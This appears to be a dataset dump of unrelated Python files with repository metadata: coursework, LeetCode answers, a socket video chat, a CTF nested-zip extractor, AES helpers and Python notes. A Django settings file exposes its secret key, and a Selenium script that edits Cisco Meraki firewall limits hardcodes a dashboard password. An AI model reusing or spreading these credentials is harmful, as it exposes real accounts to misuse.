6142e7a74039e267ec08477e21952b9991b89888 | 4ee5affb8b16ff7d26df9b19ffee8d675df11e4e | /nested-loops/train_the_trainers.py | ce76aebb5569e2ac15837eb95cccaa5edc35603a | [] | no_license | ayk-dev/python-basics | f60849f6502d64445105a0d27272d9910ea1d509 | af6d04f9001d9a45e8474f9bd4fa2b3ebe380c97 | refs/heads/main | 2023-01-12T11:56:12.210880 | 2020-11-17T20:06:40 | 2020-11-17T20:06:40 | 311,747,624 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 594 | py | n = int(input()) # number of people in jury
presentation_counter = 0
presentaion = input()
all_presentations_grades = 0
while presentaion != 'Finish':
total = 0
for pres in range(1, n + 1):
grade = float(input())
total += grade
average_grade = total / n
all_presentations_grades += average_grade
print(f'{presentaion} - {average_grade:.2f}.')
presentaion = input()
presentation_counter += 1
final_average = all_presentations_grades / presentation_counter
print(f"Student's final assessment is {final_average:.2f}.")
| [
"[email protected]"
] | |
ba50261f4095195e91f34f82c65ee1d79a2c97aa | 5e87661f1ddba14b750b374eff4a15bcda6c4ce1 | /ex1.py | b3d17b6c2117daba7a4625d607bfaf77c1d601e8 | [] | no_license | gabe32130/AST4320-A2 | cf894a9c798e15d6076ee7170a878d83593a656c | 7a17d2c491e8d5818de45180b2849b4abd865211 | refs/heads/master | 2021-07-16T04:00:16.787186 | 2017-10-20T16:16:04 | 2017-10-20T16:16:04 | 107,699,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,786 | py | import pylab as pl
import numpy as np
import cmath as m
from scipy.fftpack import fft, ifft
import matplotlib.pyplot as plt
from matplotlib import rc
from scipy.interpolate import UnivariateSpline
import pylab as pl
#plot the step function
step=1000
x=np.linspace(-10, 10, step)
xn=np.zeros(len(x))
xp=np.zeros(len(x))
Wx=np.zeros(len(x))
Wxn=np.zeros(len(x))
Wxp=np.zeros(len(x))
R=6.5
for i in range (len(x)):
if x[i] <0:
xn[i]=x[i]
if abs(xn[i]) < R:
Wxn[i]=1
else:
Wxn[i]=0
else:
xn[i]=0
for i in range (len(x)):
if x[i] >0:
xp[i]=x[i]
if abs(xp[i]) < R:
Wxp[i]=1
else:
Wxp[i]=0
else:
xp[i]=0
x= xn+xp
Wx=Wxn+Wxp
plt.plot(x,Wx, label=r'linewidth')
plt.xlabel(r'x', size=14)
plt.ylabel(r'W(x)', size=14)
plt.ylim([0,2])
plt.legend(fontsize=14)
plt.savefig("fig1.pdf",bbox_inches='tight')
plt.show()
################################################################################
#Fourier Transform
W_f=np.zeros(len(x))
k=x
W_f = np.sin(2.0*R*k)/(2.0*np.pi*k)
plt.plot(x,W_f, label=r'linewidth')
plt.xlabel(r'x', size=14)
plt.ylabel(r'W(f)', size=14)
plt.ylim([-0.5,2.5])
plt.legend(fontsize=14)
plt.savefig("fig2.pdf",bbox_inches='tight')
plt.show()
################################################################################
#FWHM
half_max=np.max(W_f)/2
print (half_max)
#max_x = x[W_f.index(half_max)]
#print (max_x)
#indx=x.index(-0.14695)
#print (indx)
x_curve = UnivariateSpline(x, W_f, s=0)
r=x_curve.roots()
L=len(r)
#print (L)
max= (L/2)-2
min= (L/2)-1
r1=r[40]
r2=r[41]
FWHM=abs(r1-r2)
print(FWHM)
pl.plot(x, W_f)
pl.axvspan(r1, r2, facecolor='g', alpha=0.5)
plt.savefig("fig3.pdf",bbox_inches='tight')
pl.show()
#-0.14695
| [
"[email protected]"
] | |
505e6466c3ca23f5decd5203746f71c43373cbe0 | 794bb12645c8f502cde6506afa684bc435d85ae7 | /VideoChat_server.py | 759b26f0c8ea72106c5c813b6973ba68b200d497 | [] | no_license | natasha012/Live-Video-Streaming-Chat-App | 4cefa0321a21b9d8e46a765dab47ac013b67e64f | 8ac8af829e3fae9a5dd7dcb6e04735910dcbaccf | refs/heads/main | 2023-05-25T20:41:41.121269 | 2021-06-10T12:35:04 | 2021-06-10T12:35:04 | 375,691,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 836 | py | import os
import cv2
import numpy as np
import socket
cap=cv2.VideoCapture(1)
# Create Socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip="192.168.56.1"
port=8888
# Socket Binding
s.bind((ip,port))
s.listen(5)
# Listening and waiting for connection
conn,addr = s.accept()
while True:
data = conn.recv(90456)
# Decode the image
arry = np.fromstring(data, np.uint8)
photo = cv2.imdecode(arry, cv2.IMREAD_COLOR)
if type(photo) is type(None):
pass
else:
cv2.imshow("SERVER-SCREEN",photo)
if cv2.waitKey(10)==13:
break
stat,photo=cap.read()
# Encode image and send via network
photo_data = cv2.imencode('.jpg', photo)[1].tobytes()
conn.sendall(photo_data)
cv2.destroyAllWindows()
cap.release()
os.system("cls") | [
"[email protected]"
] | |
70e545ac170d761713d00f1976876cde10b88210 | c6a69fb99ecf609404201a63d33d339162eb400b | /脚本/压缩包解压套娃.py | 36c0226152a077e4cfd8fc4eb3e96995d15a4946 | [] | no_license | npfs06/CTF-Tools | 519e7f51c3fde64027519f370bf9204a34abfb86 | 2334b715ad849bdf2f48d2b6225990062c8e2aa3 | refs/heads/main | 2023-07-05T02:37:19.265394 | 2021-08-25T01:13:58 | 2021-08-25T01:13:58 | 399,643,092 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 266 | py | import zipfile
def lalala(zipname):
while True:
passwd = zipname.split(".")[0]
zf = zipfile.ZipFile(zipname,'r')
zf.extractall(pwd=passwd.encode())
zipname = zf.namelist()[0]
zf.close()
lalala("hW1ES89jF.tar.gz") | [
"[email protected]"
] | |
52564c55ce188af128e41cc3810567e62b0cb71c | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_wisecracked.py | df762aa40f8d90ebf7ab0b38869d1bab6c31eb7e | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py |
#calss header
class _WISECRACKED():
def __init__(self,):
self.name = "WISECRACKED"
self.definitions = wisecrack
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['wisecrack']
| [
"[email protected]"
] | |
ff22176a2b050a193f1882462e0d36e591e42784 | cb0e7d6493b23e870aa625eb362384a10f5ee657 | /solutions/python3/0567.py | 65478b7cc2fb087117f7698fe743cdccb13f091a | [] | no_license | sweetpand/LeetCode-1 | 0acfa603af254a3350d457803449a91322f2d1a7 | 65f4ef26cb8b2db0b4bf8c42bfdc76421b479f94 | refs/heads/master | 2022-11-14T07:01:42.502172 | 2020-07-12T12:25:56 | 2020-07-12T12:25:56 | 279,088,171 | 1 | 0 | null | 2020-07-12T15:03:20 | 2020-07-12T15:03:19 | null | UTF-8 | Python | false | false | 500 | py | class Solution:
def checkInclusion(self, s1: str, s2: str) -> bool:
count1 = collections.Counter(s1)
required = len(s1)
for r, c in enumerate(s2):
count1[c] -= 1
if count1[c] >= 0:
required -= 1
if r >= len(s1):
count1[s2[r - len(s1)]] += 1
if count1[s2[r - len(s1)]] > 0:
required += 1
if required == 0:
return True
return False
| [
"[email protected]"
] | |
5011edd540e59266a4dab322eeabf74f75d8df9e | 76db1e651dba6c639e61a5c251583390ffd60b93 | /kConcatenationMaxSum.py | 8098b05eaf3abe2b55ad64af0efd551a19fee2d5 | [] | no_license | keenouter/leetcode | 58127ece6d4f76a4e80a00ec564ee46143d72232 | ebb485d7fdb9c3df9669ecf94315ebc0a836977f | refs/heads/master | 2022-04-24T06:56:27.982291 | 2020-04-30T06:34:10 | 2020-04-30T06:34:10 | 260,130,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,550 | py | class Solution:
def kConcatenationMaxSum(self, arr, k):
# max_index=0
# max_child_sum=0
# arr_sum=0
# temp=0
# min_sum=0
# max_sum=0
# for i in range(len(arr)):
# arr_sum+=arr[i]
# if temp>0:
# if temp>max_child_sum:
# max_child_sum=temp
# max_index=i
# temp+=arr[i]
# elif temp<=0:
# if arr[i]<=0:
# temp=0
# else:
# temp=arr[i]
# if arr_sum<min_sum:
# min_sum=arr_sum
# if arr_sum>max_sum:
# max_sum=arr_sum
# if temp>max_child_sum:
# max_child_sum=temp
# max_index= len(arr)
# print(arr_sum,max_child_sum,temp)
# return max([arr_sum*k-min_sum,arr_sum*(k-1)+sum(arr[:max_index])-min_sum,max_child_sum,temp+max_sum,0])
arr_sum_list=[0]
temp=0
max_index=0
max_sum=0
for i in range(len(arr)):
temp+=arr[i]
if temp>max_sum:
max_sum=temp
max_index=i+1
arr_sum_list.append(temp)
left_min=min(arr_sum_list[:max_index-1])
right_min=min(arr_sum_list[max_index+1:]+[0])
return max([arr_sum_list[-1]*(k-1)+max_sum - left_min*2,])
print(Solution().kConcatenationMaxSum([1,2,3],3))
| [
"[email protected]"
] | |
372c0a5bf62df64d0962abad6fd583321f129e17 | ebf9a2a442dc3710129fb73ae432d1050098b01c | /joint_motion_server.py | 56243d5d9ff8e8010bcfdb730e649e67e904a8ad | [] | no_license | iskandersauma/stomp-chomp | f8f4bcf55946287e029ddfbe2186b637d6dd56df | 22b228350e80dcba2baa438e9c1199fb2a6ac44d | refs/heads/master | 2022-07-31T20:18:46.100687 | 2020-05-24T17:40:59 | 2020-05-24T17:40:59 | 266,592,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,534 | py | #! /usr/bin/env python
import rospy
import actionlib
import asp_tools.msg
from asp_tools.srv import MoveJoints
from abstract_motion_server import AbstractMotionServer
class JointMotionAction(AbstractMotionServer):
def __init__(self, name):
super(JointMotionAction, self).__init__(name)
def _init_server(self):
self._feedback = asp_tools.msg.JointMotionFeedback()
self._result = asp_tools.msg.JointMotionResult()
self._as = actionlib.SimpleActionServer(self._action_name, asp_tools.msg.JointMotionAction, execute_cb=self.execute_cb, auto_start = False)
def call_service(self, goal):
"""
Calls the motion service. Returns true if the call wass successfull,
false otherwise.
"""
# publish info to the console for the user
rospy.loginfo('%s: Executing the joint motion action' % (self._action_name))
rospy.wait_for_service('/asp/move_joints')
try:
self.plan_executed = False
move_joints = rospy.ServiceProxy('/asp/move_joints', MoveJoints)
resp = move_joints(x=goal.x, y=goal.y, b=goal.b, z=goal.z, a=goal.a, async=True)
executed, planned = resp.executed, resp.planned
except rospy.ServiceException, e:
print "move_joints service call failed: %s"%e
executed, planned = False, False
return executed, planned
if __name__ == '__main__':
rospy.init_node('joint_motion')
server = JointMotionAction(rospy.get_name())
rospy.spin()
| [
"[email protected]"
] | |
9cd50b1e4b2cea56a81f0057f7a4137c0153622c | 39a8bb0bcbca9a9e25705decead580602dbcfd2b | /meraki_cisco_parser.py | 9b945c602780e21342c7524f27ddcc68efaa9c2d | [] | no_license | NickVK9/Cisco-Meraki-Selenium-project | 1e1fa829d763564d7c60cc2830bcef9392946a30 | 59fe8ed7d69293d2df3d709dbc13efbed4a84c98 | refs/heads/master | 2020-11-28T08:42:16.639710 | 2019-12-25T06:41:37 | 2019-12-25T06:41:37 | 229,759,425 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,012 | py | from selenium import webdriver
import csv
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
import time
LOGIN = "[email protected]"
PASSWORD = "Plussix@88"
LINK = "https://account.meraki.com/secure/login/dashboard_login"
# PLEASE, PUT YOUR PATH TO CHROMEDRIVER
PATH_TO_CHROMEDRIVER = "C:\\Users\\Nick\\Desktop\\Cisco-Meraki-Selenium-project-master\\chromedriver.exe"
# PLEASE, WRITE HERE FILE'S NAME
FILE = 'Network.csv'
# PLEASE, WRITE HERE PATH TO CSV FILE
PATH_TO_CSV_FILE = "C:\\Users\\Nick\\Desktop\\Cisco-Meraki-Selenium-project-master\\"
COLUMN_NAME = 'Network Name' #Name of head column, to drop it
ORGANIZATION = 'Boyd Hyperconverged Inc'
# THIS DICT MADE TO FOLLOW WHICH NETWORKS ALREADY DONE
CHECK = {}
browser = webdriver.Chrome(executable_path=PATH_TO_CHROMEDRIVER)
with open(PATH_TO_CSV_FILE + FILE) as f:
#HERE PROGRAM TAKES ALL NETWORK NAMES AND TAKE THEM TO DICTIONARY
reader = csv.reader(f)
for row in reader:
if row[0] != COLUMN_NAME:
CHECK[row[0]] = ''
def take_network_from_csv():
global FILE
global PATH_TO_CSV_FILE
global COLUMN_NAME
global CHECK
global PATH_TO_CHROMEDRIVER
for i in CHECK:
if CHECK[i] != 'Done':
network_name = i
open_link(browser, network_name)
CHECK[network_name] = 'Done'
else:
continue
def open_link(browser, network_name):
# THIS IS MAIN FUNCTION
global LINK
global LOGIN
global PASSWORD
browser.get(LINK)
#LOG IN
email = browser.find_element_by_id('email')
password = browser.find_element_by_id('password')
email.send_keys(LOGIN)
password.send_keys(PASSWORD)
submit_button = browser.find_element_by_id('commit')
submit_button.click()
# CHOOSE NEEDED ORGANISATION
organization = browser.find_element_by_link_text('Boyd Hyperconverged Inc')
organization.click()
#WAITING FOR PAGE LOADING
time.sleep(3)
# FIND AND CHOOSE NEEDED NETWORK
select_arrow_zone = browser.find_element_by_class_name('Select-arrow-zone')
select_arrow_zone.click()
input_network = browser.find_element_by_xpath('//*[@id="react-select-2--value"]/div[2]/input')
input_network.send_keys(network_name)
input_network.send_keys(Keys.ENTER)
#GOING TO Firewall & traffic shaping
tables = browser.find_elements_by_class_name('menu-item-container')
for i in tables:
if i.text == 'Wireless':
needed_table = i
needed_table.click()
time.sleep(3)
organization = browser.find_elements_by_tag_name('a')
for i in organization:
if i.text == 'Firewall & traffic shaping' or i.text == 'Firewall':
firewall = i
firewall.click()
# SWITCHES SLIDERS
client_slider = browser.find_elements_by_class_name('simple')
if client_slider[0].text != 'unlimited':
source_element = browser.find_element_by_xpath('//*[@id="per_client_limit"]/table/tbody/tr/td[1]/div/div[2]/a')
dest_element = browser.find_element_by_class_name('bandwidth_widget_toggle')
ActionChains(browser).drag_and_drop(source_element, dest_element).perform()
if client_slider[1].text != 'unlimited':
source_element = browser.find_element_by_xpath('//*[@id="per_ssid_limit"]/table/tbody/tr/td[1]/div/div[2]/a')
dest_element = browser.find_element_by_class_name('bandwidth_widget_toggle')
ActionChains(browser).drag_and_drop(source_element, dest_element).perform()
time.sleep(5)
# SAVING
try:
save_changes = browser.find_element_by_id('floating_submit')
save_changes.click()
except:
print('Already Unlimited')
browser.quit()
if __name__ == '__main__':
while True:
try:
take_network_from_csv()
break
except:
browser.quit()
take_network_from_csv()
print('DONE')
| [
"[email protected]"
] | |
c6f6ba2d9b4e9d5fb450005f0c441d8158549d6f | 7f7239ca087141faf3706994a5209ed0c1f8c21f | /Python Crash Course/Chinese Version/第三章 列表简介.py | cbbafaf34e9db381a4208a1b71434e1ee83d6da6 | [] | no_license | xiemeigongzi88/Python_Beginners | f81bfaec6a3f607c18514d9c7c3d93271652cc8c | 72a85cbd132ecab2c0d607f06d5e21002628795f | refs/heads/master | 2021-07-01T14:39:43.346280 | 2020-10-30T17:52:47 | 2020-10-30T17:52:47 | 173,500,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,183 | py | 第三章 列表简介
Page 26 - 33
Page 26
3.1 列表是 什么?
列表:
由一系列按照 特定顺序排列的元素组成
其中元素之间可以没有任何关系
用 [] 来表示列表
bicycles=['trek','cannondale','redline','specialized']
print(bicycles)
OUT:
['trek', 'cannondale', 'redline', 'specialized']
3.1.1 访问列表元素
bicycles=['trek','cannondale','redline','specialized']
print(bicycles[0])
OUT:
trek
######################################
bicycles=['trek','cannondale','redline','specialized']
print(bicycles[0].title())
OUT:
Trek
########################################
bicycles=['trek','cannondale','redline','specialized']
print(bicycles[1])
print(bicycles[3])
print("###########")
print(bicycles[-1])
print(bicycles[-2])
print(bicycles[-3])
print(bicycles[-4])
OUT:
cannondale
specialized
###########
specialized
redline
cannondale
trek
3.1.3 使用列表中的各个值
可以使用拼接根据列表中的值 来 创建信息
bicycles=['trek','cannondale','redline','specialized']
message="My first bicycle was a "+bicycles[0].title()+"."
print(message)
OUT:
My first bicycle was a Trek.
###########################################
EXC 3-1
names=['Abel','Erica','Eric','Batholomew','Ana','Ada']
print(names)
for i in range(len(names)):
print(names[i])
OUT:
['Abel', 'Erica', 'Eric', 'Batholomew', 'Ana', 'Ada']
Abel
Erica
Eric
Batholomew
Ana
Ada
#######################################
EXC 3-2
names=['Abel','Erica','Eric','Batholomew','Ana','Ada']
print(names)
for i in range(len(names)):
print(names[i]+"\n Good Luck!")
################
EXC 3-3
Page 27
3.2 修改 添加 删除 元素
创建的 列表是动态的 在列表创建后 可与运行 删除 增加 操作
3.2.1 修改列表元素
motor=['honda','yamaha','suzuki']
print(motor)
motor[2]='ducati'
print(motor)
OUT:
['honda', 'yamaha', 'suzuki']
['honda', 'yamaha', 'ducati']
motor[3]='scar'
IndexError: list assignment index out of range
## 也就是说 列表只能对已存在的元素进行修改
3.2.2 在列表中添加元素
1. 在列表末尾添加元素
motor=['honda','yamaha','suzuki']
print(motor)
motor.append('ducati')
print(motor)
OUT:
['honda', 'yamaha', 'suzuki']
['honda', 'yamaha', 'suzuki', 'ducati']
##################################
a=[]
print(a)
a.append(1)
a.append(2)
a.append(3)
a.append(4)
a.append(5)
a.append(6)
print(a)
OUT:
[]
[1, 2, 3, 4, 5, 6]
经常要等到程序运行后 才能知道 用户在程序中存储了哪些数据
2. 在列表中插入元素
使用 insert() 方法 可在任意为止添加新元素
a=['honda','toyota','Benz','LandRover','nissa']
print(a)
a.insert(1,'civic')
print(a)
OUT:
['honda', 'toyota', 'Benz', 'LandRover', 'nissa']
['honda', 'civic', 'toyota', 'Benz', 'LandRover', 'nissa']
3.2.3 从列表中删除元素
1. 使用 del 语句删除元素
a=['honda','toyota','Benz','LandRover','nissa']
print(a)
del a[4]
print(a)
OUT:
['honda', 'toyota', 'Benz', 'LandRover', 'nissa']
['honda', 'toyota', 'Benz', 'LandRover']
2. 使用 pop() 方法 删除元素
将元素从列表中删除 并接着使用这个元素的值
pop() 可以删除列表末尾的元素 并可以使用
a=['honda','toyota','Benz','LandRover','nissa']
print(a)
b=a.pop()
print(b)
print(a)
OUT:
['honda', 'toyota', 'Benz', 'LandRover', 'nissa']
nissa
['honda', 'toyota', 'Benz', 'LandRover']
##################################
a=['honda','toyota','Benz','LandRover','nissa']
b=a.pop()
print("The last motor I owned was a "+b.title()+".")
OUT:
The last motor I owned was a Nissa.
3. 弹出列表中任意位置的元素
a=['honda','toyota','Benz','LandRover','nissa']
print(a)
b=a.pop(0)
print(b)
print(a)
OUT:
['honda', 'toyota', 'Benz', 'LandRover', 'nissa']
honda
['toyota', 'Benz', 'LandRover', 'nissa']
当使用 pop() 时, 被弹出的元素就不在列表中了
如果要从列表中删除一个元素 且 不再以任何方式使用, 就是用 del 语句
如果要在删除元素后还要再使用它, 就使用 pop() 方法
4. 根据值 删除元素
不知道 从列表中删除的值 所在的位置
使用 remove() 方法
a=['honda','toyota','Benz','LandRover','nissa']
print(a)
a.remove('Benz')
print(a)
OUT:
['honda', 'toyota', 'Benz', 'LandRover', 'nissa']
['honda', 'toyota', 'LandRover', 'nissa']
使用 remove() 从列表中删除元素时, 也课接着使用它的值
a=['honda','toyota','benz','LandRover','nissa']
print(a)
b='benz'
a.remove(b)
print(a)
print("\nA "+b.title()+" is too expensive for me.")
OUT:
['honda', 'toyota', 'benz', 'LandRover', 'nissa']
['honda', 'toyota', 'LandRover', 'nissa']
A Benz is too expensive for me.
OUT:
['honda', 'toyota', 'benz', 'LandRover', 'nissa']
['honda', 'toyota', 'LandRover', 'nissa']
A Benz is too expensive for me.
Note:
方法 remove() 只是删除第一个指定的值, 如果要删除 的值可能在列表中出现多次 就需要循环来判断是否删除了所有这样的值
remove() 根据元素的内容删除
pop() 根据元素的位置删除
Page 30
3.3 组织列表
3.3.1 使用方法 sort() 对列表进行永久性排序
对列表元素排列顺序的修改是 永久性的
cars=['bmw','audi','toyota','subaru']
print(cars)
cars.sort()
print(cars)
OUT:
['bmw', 'audi', 'toyota', 'subaru']
['audi', 'bmw', 'subaru', 'toyota']
# 永久性地修改了列表元素地顺序 再也无法恢复到 原来的排列顺序
还可以按与字母顺序相反的顺序排列列表元素
cars=['bmw','audi','toyota','subaru']
print(cars)
cars.sort()
print(cars)
cars.sort(reverse=True)
print(cars)
OUT:
['bmw', 'audi', 'toyota', 'subaru']
['audi', 'bmw', 'subaru', 'toyota']
['toyota', 'subaru', 'bmw', 'audi']
3.3.2 使用函数 sorted() 对列表进行临时排序
要保留 原来 列表元素的排列顺序, 同时能以特定的顺序呈现列表元素, 可是使用 sorted() 函数
sorted() 能够按照特定的顺序显示 列表元素 同时不影响它们在列表中的原始排列顺序
cars=['bmw','audi','toyota','subaru']
print("here is the original list:")
print(cars)
print("\nhere is the sorted list:")
print(sorted(cars))
print("\nhere is the original list again:")
print(cars)
OUT:
here is the original list:
['bmw', 'audi', 'toyota', 'subaru']
here is the sorted list:
['audi', 'bmw', 'subaru', 'toyota']
here is the original list again:
['bmw', 'audi', 'toyota', 'subaru']
调用 函数 sorted() 以后, 列表元素的排列顺序没有发生改变
print("\nhere is the reverse sorted list:")
print(sorted(cars,reverse=True))
OUT:
here is the reverse sorted list:
['toyota', 'subaru', 'bmw', 'audi']
3.3.3 倒着打印列表
要反转列表元素的排列顺序 可以使用 reverse()
cars=['bmw','audi','toyota','subaru']
print(cars)
cars.reverse()
print(cars)
OUT:
['bmw', 'audi', 'toyota', 'subaru']
['subaru', 'toyota', 'audi', 'bmw']
##Note:
方法 reverse() 永久的修改了 列表元素的排列顺序, 但是可以随时恢复到原来的排列顺序 只需要 对列表再次调用 reverse() 即可
3.3.4 确定列表的长度
len()
>>> cars=['bmw','audi','toyota','subaru']
>>> len(cars)
4
Page 32
3.4 使用列表时 避免索引错误
cars=['bmw','audi','toyota','subaru']
print(cars[4])
OUT:
IndexError: list index out of range
####################################
cars=['bmw','audi','toyota','subaru']
print(cars[-1])
a=[]
print(a[-1])
OUT:
subaru
File "C:/Users/sxw17/PycharmProjects/myPro_obj/mypy_01.py", line 6, in <module>
print(a[-1])
IndexError: list index out of range
#Note:
仅当列表未空的时候,不包含任何元素
| [
"[email protected]"
] | |
37a024c9f7fb0d090e1597c0898fc90ded145af4 | bf02d02dad536f48dff434aae2b737d58d9ef216 | /mysite/mysite/settings.py | 57fbd51bd69a684e35624379b4a2f0ff6f672a68 | [] | no_license | myselfsai/project1 | f59d090829782f46770a0d360a9f88928a8f720f | ac74079040beb2dd74dbefe7c2faba01126355b7 | refs/heads/master | 2021-01-15T12:02:12.123298 | 2020-01-24T05:13:28 | 2020-01-24T05:13:28 | 99,643,762 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,126 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'fip#j!(h_g(6=en_4@^y%y=x!d2pp+@exd3fr$ve_n20-mjggp'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'polls.apps.PollsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
bfcab4cecd2a7d8e3946cf55d03659e839d25b3d | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/82/usersdata/165/44623/submittedfiles/decimal2bin.py | b07134dde6b2df7bd468626e44d12cc75e301ed4 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | # -*- coding: utf-8 -*-
n=int(input('digite n:'))
i=0
soma=0
while n>0:
resto=n%10
soma=soma+resto*(2**i)
n=n//10
i=i+1
print(soma)
| [
"[email protected]"
] | |
2406f8d30bec4dab92a9975052e0714bba593eaf | 986853c69a9dfc13ca5303f7e56db028f114a744 | /fiboncci series.py | 22ec2d5e8c79f99d8c5335d34f7f44ed266123e6 | [] | no_license | omee1/Python | 78320d04f48eab1a9b929fca92813be36e33a302 | ba94ecbb0afd2f99b70e3bfd2b4837d0d4fce354 | refs/heads/master | 2023-08-18T17:01:29.977259 | 2021-10-21T09:22:13 | 2021-10-21T09:22:13 | 419,625,589 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | def series(n):
a=0
b=1
count=0
while count<n:
print(a,end=",")
c=a+b
a=b
b=c
count +=1
num=int(input("enter the no"))
print(series(num)) | [
"[email protected]"
] | |
79f62a7ee6eb1f0d6df192c475af8fec47ca39a9 | ea5af064f6583c4dc244627f67bf51a9119347a9 | /crypto.py | 4c6a27ad97768b78070c68886cdd9f351d4f73f8 | [] | no_license | celiyan/PyPassManager | 034c10cfe594d365822dc836e0f0143e02ac25e3 | fda994b44b7a003825e16bbcaffd07cf094e04b7 | refs/heads/master | 2022-12-19T19:51:29.714559 | 2020-10-15T05:16:37 | 2020-10-15T05:16:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,530 | py | from Crypto.Cipher import AES
from os import urandom
def pad(txt):
"AES CBC requires the number of plaintext bytes to be a multiple of 16, so we pad it to the nearest multiple. Takes&Returns bytes object."
padding_length = AES.block_size - len(txt)%AES.block_size
# we pad with a character = to the padding length, to make unpadding easy
padding = chr(padding_length) * padding_length
return txt+padding.encode()
def unpad(txt):
"To get just the encrypted data back, we need to undo any meaningless padding we added to satisfy length requirements. Takes&Returns bytes object."
padding_length = txt[-1] # length is stored as the character code of the padding
return txt[:-padding_length]
def encrypt(raw, key):
"Encrypt bytes using AES CBC, and a random InitialVector that is stored at the start. Inputs two bytes objects: plaintext & key. Returns ciphertext as bytes object."
iv = urandom(AES.block_size)
key = key[:32] # key must be 32 bytes, masterpass hash is 64 bytes
cipher = AES.new(key, AES.MODE_CBC, iv)
return iv+cipher.encrypt(pad(raw)) # store iv so it can be decoded
def decrypt(data, key):
"Decrypt bytes using AES CBC, extracting the InitialVector from the start. Inputs two bytes objects: ciphertext & key. Returns plaintext as bytes object."
iv, data = data[:AES.block_size], data[AES.block_size:] # extract the iv from the start
key = key[:32] # key must be 32 bytes, masterpass hash is 64 bytes
cipher = AES.new(key, AES.MODE_CBC, iv)
return unpad(cipher.decrypt(data)) | [
"[email protected]"
] | |
9feacf0a85e2b4cb750a3f12f786d8971b96efc5 | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/AtCoder/arc042/B/4081354.py | 8eea907c466a07c6b45bfcd05fcae80479294c1a | [] | no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | #!/usr/bin/env python3
p = complex(*list(map(int, input().split())))
N = int(input())
li = [complex(*list(map(int, input().split()))) for _ in range(N)]
li += [li[0]]
m = min(((p - a) / (b - a)).imag * abs(b - a) for a, b in zip(li, li[1:]))
print(m) | [
"[email protected]"
] | |
